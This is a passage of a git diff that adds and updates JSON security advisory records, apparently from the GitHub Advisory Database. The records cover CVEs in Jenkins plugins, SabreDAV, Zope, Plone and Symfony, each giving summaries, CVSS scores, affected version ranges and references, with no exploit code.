"https://web.archive.org/web/20200228181137/http://www.securityfocus.com/bid/61709" diff --git a/advisories/github-reviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json b/advisories/github-reviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json new file mode 100644 index 0000000000000..b98284cedddf5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc3m-6xmq-7hrj", + "modified": "2024-01-30T22:24:20Z", + "published": "2022-05-13T01:31:33Z", + "aliases": [ + "CVE-2019-10289" + ], + "summary": "CSRF vulnerability in Jenkins Netsparker Enterprise Scan Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins Netsparker Cloud Scan Plugin 1.1.5 and older in the NCScanBuilder.DescriptorImpl#doValidateAPI form validation method allowed attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:netsparker-cloud-scan" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10289" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1032" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:24:20Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-qg5v-jw6f-rpfj/GHSA-qg5v-jw6f-rpfj.json b/advisories/github-reviewed/2022/05/GHSA-qg5v-jw6f-rpfj/GHSA-qg5v-jw6f-rpfj.json index 765bc1b770b25..ce4771e04ce10 100644 --- a/advisories/github-reviewed/2022/05/GHSA-qg5v-jw6f-rpfj/GHSA-qg5v-jw6f-rpfj.json +++ b/advisories/github-reviewed/2022/05/GHSA-qg5v-jw6f-rpfj/GHSA-qg5v-jw6f-rpfj.json @@ -22,10 +22,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.7.0" }, { - "fixed": "1.6.9" + "fixed": "1.7.7" } ] } @@ -41,10 +41,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.7.0" + "introduced": "1.8.0" }, { - "fixed": "1.7.7" + "fixed": "1.8.5" } ] } @@ -60,10 +60,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.8.0" + "introduced": "1.6.0" }, { - "fixed": "1.8.5" + "fixed": "1.6.9" } ] } @@ -75,6 +75,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1939" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sabre/dav/CVE-2013-1939.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/sabre-io/dav" @@ -82,6 +86,14 @@ { "type": "WEB", "url": "https://groups.google.com/forum/?fromgroups=#!topic/sabredav-discuss/ehOUu7wTSGQ" + }, + { + "type": "WEB", + "url": "https://groups.google.com/forum/?fromgroups=#%21topic/sabredav-discuss/ehOUu7wTSGQ" + }, + { + "type": "WEB", + "url": "http://owncloud.org/about/security/advisories/oC-SA-2013-016/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json b/advisories/github-reviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json new file mode 100644 index 0000000000000..a5a44f71d1312 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json @@ -0,0 +1,80 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qg7x-4h4q-3m49", + "modified": "2024-01-30T21:10:30Z", + "published": "2022-05-24T17:06:12Z", + "aliases": [ + "CVE-2015-1811" + ], + "summary": "XML external entity (XXE) vulnerability in Jenkins", + "details": "XML external entity (XXE) vulnerability in Jenkins before 1.600 and LTS before 1.596.1 allows remote attackers to read arbitrary XML files via a crafted XML document.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.597" + }, + { + "fixed": "1.600" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.596.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1811" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1205632" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2015-02-27/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:10:30Z", + "nvd_published_at": "2020-01-15T19:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json b/advisories/github-reviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json new file mode 100644 index 0000000000000..49f37d1f81ab8 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qh3m-c6hw-5hmv", + "modified": "2024-01-30T21:14:01Z", + "published": "2022-05-24T17:03:47Z", + "aliases": [ + "CVE-2019-16556" + ], + "summary": "Jenkins Rundeck Plugin stored credentials in plain text ", + "details": "Jenkins Rundeck Plugin 3.6.5 and earlier stores credentials unencrypted in its global configuration file and in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:rundeck" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.6.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.6.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16556" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1636" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:14:01Z", + "nvd_published_at": "2019-12-17T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json b/advisories/github-reviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json new file mode 100644 index 0000000000000..d446abb4ef1cd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qh4q-fwf8-qqrw", + "modified": "2024-02-08T15:40:04Z", + "published": "2022-05-17T05:48:31Z", + "aliases": [ + "CVE-2010-3198" + ], + "summary": "Zope Denial of Service (DoS) vulnerability in ZServer", + "details": "ZServer in Zope 2.10.x before 2.10.12 and 2.11.x before 2.11.7 allows remote attackers to cause a denial of service (crash of worker threads) via vectors that trigger uncaught exceptions.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Zope" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.10.0" + }, + { + "fixed": "2.10.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "Zope" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.11.0" + }, + { + "fixed": "2.11.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3198" + }, + { + "type": "WEB", + "url": "https://github.com/zopefoundation/Zope/commit/0f2f56f63e4a4d695ee670e02b317e900550dbac" + }, + { + "type": "WEB", + "url": "https://github.com/zopefoundation/Zope/commit/e03a5f036d42ed2426886c9035fe018eeec65de4" + }, + { + "type": "WEB", + "url": "https://bugs.launchpad.net/zope2/+bug/627988" + }, + { + "type": "PACKAGE", + "url": "https://github.com/zopefoundation/Zope" + }, + { + "type": "WEB", + "url": "https://mail.zope.org/pipermail/zope-announce/2010-September/002247.html" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200229173503/http://www.securityfocus.com/bid/42939" + }, + { + "type": "WEB", + "url": "http://www.zope.org/Products/Zope/2.10.12/CHANGES.txt" + }, + { + "type": "WEB", + "url": "http://www.zope.org/Products/Zope/2.11.7/CHANGES.txt" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:40:04Z", + "nvd_published_at": "2010-09-08T20:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json b/advisories/github-reviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json new file mode 100644 index 0000000000000..815abec0c21f1 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json @@ -0,0 +1,80 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qj27-w92h-fc9r", + "modified": "2024-01-30T21:10:14Z", + "published": "2022-05-24T17:06:12Z", + "aliases": [ + "CVE-2015-1809" + ], + "summary": "XML external entity (XXE) vulnerability in Jenkins", + "details": "XML external entity (XXE) vulnerability in Jenkins before 1.600 and LTS before 1.596.1 allows remote attackers to read arbitrary XML files via an XPath query.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.597" + }, + { + "fixed": "1.600" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.596.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1809" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1205625" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2015-02-27/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:10:14Z", + "nvd_published_at": "2020-01-15T19:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json b/advisories/github-reviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json new file mode 100644 index 0000000000000..1ebf33e6ca190 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qj7x-wm9q-qjx8", + "modified": "2024-02-08T15:45:46Z", + "published": "2022-05-17T05:50:05Z", + "aliases": [ + "CVE-2010-2422" + ], + "summary": "Plone Cross-site Scripting vulnerability in PortalTransforms", + "details": "Cross-site scripting (XSS) vulnerability in PortalTransforms in Plone 2.1 through 3.3.5 before hotfix 20100612 allows remote attackers to inject arbitrary web script or HTML via the safe_html transform.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Plone" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.1" + }, + { + "fixed": "3.3.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.3.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2422" + }, + { + "type": "PACKAGE", + "url": "https://github.com/plone/Plone" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100728161728/http://secunia.com/advisories/40270" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228223808/http://www.securityfocus.com/bid/40999" + }, + { + "type": "WEB", + "url": "http://plone.org/products/plone/security/advisories/cve-2010-unassigned-html-injection-in-safe_html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:45:46Z", + "nvd_published_at": "2010-06-24T12:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-qm4x-ch5w-gr62/GHSA-qm4x-ch5w-gr62.json b/advisories/github-reviewed/2022/05/GHSA-qm4x-ch5w-gr62/GHSA-qm4x-ch5w-gr62.json index cb5a7a4b460af..c537e527ce98a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-qm4x-ch5w-gr62/GHSA-qm4x-ch5w-gr62.json +++ b/advisories/github-reviewed/2022/05/GHSA-qm4x-ch5w-gr62/GHSA-qm4x-ch5w-gr62.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-qm4x-ch5w-gr62", - "modified": "2023-07-07T19:42:46Z", + "modified": "2024-02-06T13:20:07Z", "published": "2022-05-17T04:42:42Z", "aliases": [ "CVE-2014-2055" ], - "summary": "XXE in SabreDAV before 1.7.11", + "summary": "XXE in SabreDAV", "details": "SabreDAV before 1.7.11, as used in ownCloud Server before 5.0.15 and 6.0.x before 6.0.2, allows remote attackers to read arbitrary files, cause a denial of service, or possibly have other impact via an XML External Entity (XXE) attack.", "severity": [ @@ -22,7 +22,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.6.0" }, { "fixed": "1.7.11" @@ -30,6 +30,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "sabre/dav" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.8.0" + }, + { + "fixed": "1.8.9" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,14 @@ { "type": "WEB", "url": "https://github.com/sabre-io/dav/commit/e3f46e0ecf83cf1d2ebf54908cde7b5ec170aa2c" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sabre/dav/CVE-2014-2055.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/fruux/sabre-dav/releases/tag/1.7.11" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-qmqw-mpqp-mr54/GHSA-qmqw-mpqp-mr54.json b/advisories/github-reviewed/2022/05/GHSA-qmqw-mpqp-mr54/GHSA-qmqw-mpqp-mr54.json index 7b098cc58d6b9..936e7f023246a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-qmqw-mpqp-mr54/GHSA-qmqw-mpqp-mr54.json +++ b/advisories/github-reviewed/2022/05/GHSA-qmqw-mpqp-mr54/GHSA-qmqw-mpqp-mr54.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qmqw-mpqp-mr54", - "modified": "2023-08-03T21:47:36Z", + "modified": "2024-02-08T19:21:57Z", "published": "2022-05-17T03:11:51Z", "aliases": [ "CVE-2015-4050" @@ -12,6 +12,63 @@ ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-kernel" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.19" + }, + { + "fixed": "2.3.29" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-kernel" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.5.4" + }, + { + "fixed": "2.5.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-kernel" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.6.0" + }, + { + "fixed": "2.6.8" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -29,10 +86,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.3.28" - } + ] }, { "package": { @@ -44,17 +98,33 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.4.0" + "introduced": "2.4.9" + }, + { + "last_affected": "2.4.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.5.4" }, { "fixed": "2.5.12" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.5.11" - } + ] }, { "package": { @@ -73,10 +143,26 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.6.7" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-kernel" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.9" + }, + { + "last_affected": "2.4.10" + } + ] + } + ] } ], "references": [ @@ -84,6 +170,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-4050" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-kernel/CVE-2015-4050.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2015-4050.yaml" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2015-4050" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200228090443/http://www.securityfocus.com/bid/74928" diff --git a/advisories/github-reviewed/2022/05/GHSA-qqh2-h6gw-6x8x/GHSA-qqh2-h6gw-6x8x.json b/advisories/github-reviewed/2022/05/GHSA-qqh2-h6gw-6x8x/GHSA-qqh2-h6gw-6x8x.json index 0323f7f05a485..1ae80c7d1d78d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-qqh2-h6gw-6x8x/GHSA-qqh2-h6gw-6x8x.json +++ b/advisories/github-reviewed/2022/05/GHSA-qqh2-h6gw-6x8x/GHSA-qqh2-h6gw-6x8x.json @@ -117,10 +117,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 6.2.2" - } + ] } ], "references": [ @@ -128,6 +125,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3943" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2014-3943.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2014-001/" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200229060129/http://www.securityfocus.com/bid/67625" @@ -147,6 +152,10 @@ { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2014/06/03/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/67625" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json b/advisories/github-reviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json new file mode 100644 index 0000000000000..bfa7eb29d01a9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrh2-mh97-pw8p", + "modified": "2024-01-30T22:25:32Z", + "published": "2022-05-13T01:25:43Z", + "aliases": [ + "CVE-2019-1003076" + ], + "summary": "CSRF vulnerability in Jenkins Audit to Database Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins Audit to Database Plugin in the DbAuditPublisherDescriptorImpl#doTestJdbcConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:audit2db" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003076" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-977" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:25:32Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-qx76-c53f-5c7q/GHSA-qx76-c53f-5c7q.json b/advisories/github-reviewed/2022/05/GHSA-qx76-c53f-5c7q/GHSA-qx76-c53f-5c7q.json index b8c110293aab9..662991d2ba8de 100644 --- a/advisories/github-reviewed/2022/05/GHSA-qx76-c53f-5c7q/GHSA-qx76-c53f-5c7q.json +++ b/advisories/github-reviewed/2022/05/GHSA-qx76-c53f-5c7q/GHSA-qx76-c53f-5c7q.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://commonmark.thephpleague.com/changelog/" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/league/commonmark/CVE-2018-20583.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/thephpleague/commonmark" diff --git a/advisories/github-reviewed/2022/05/GHSA-r2rq-3h56-fqm4/GHSA-r2rq-3h56-fqm4.json b/advisories/github-reviewed/2022/05/GHSA-r2rq-3h56-fqm4/GHSA-r2rq-3h56-fqm4.json index 40c769625d4d0..3e1f1a92569af 100644 --- a/advisories/github-reviewed/2022/05/GHSA-r2rq-3h56-fqm4/GHSA-r2rq-3h56-fqm4.json +++ b/advisories/github-reviewed/2022/05/GHSA-r2rq-3h56-fqm4/GHSA-r2rq-3h56-fqm4.json @@ -109,6 +109,101 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] } ], "references": [ @@ -116,6 +211,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11386" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2018-11386.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-11386.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -136,6 +239,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2018-11386-denial-of-service-when-using-pdosessionhandler" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2018-11386" + }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4262" diff --git a/advisories/github-reviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json b/advisories/github-reviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json new file mode 100644 index 0000000000000..1329c7c34fcc5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json @@ -0,0 +1,51 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5c7-qcc9-5v7m", + "modified": "2024-01-30T22:33:30Z", + "published": "2022-05-13T01:36:51Z", + "aliases": [ + "CVE-2017-2650" + ], + "summary": "Jenkins Pipeline Classpath Step plugin allowed Script Security sandbox bypass", + "details": "It was found that the use of Pipeline: Classpath Step Jenkins plugin enables a bypass of the Script Security sandbox for users with SCM commit access, as well as users with e.g. Job/Configure permission in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "cprice404:pipeline-classpath" + }, + "versions": [ + "0.1.0" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2650" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-03-20/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/96981" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:33:30Z", + "nvd_published_at": "2018-07-27T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json b/advisories/github-reviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json new file mode 100644 index 0000000000000..d56c035b59615 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5jr-82x4-r6j7", + "modified": "2024-01-30T21:53:09Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003097" + ], + "summary": "Jenkins Crowd Integration Plugin stores credentials in plain text", + "details": "Jenkins Crowd Integration Plugin stores credentials unencrypted in the global config.xml configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.ds.tools.hudson:crowd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003097" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/crowd-plugin" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1069" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:53:09Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git 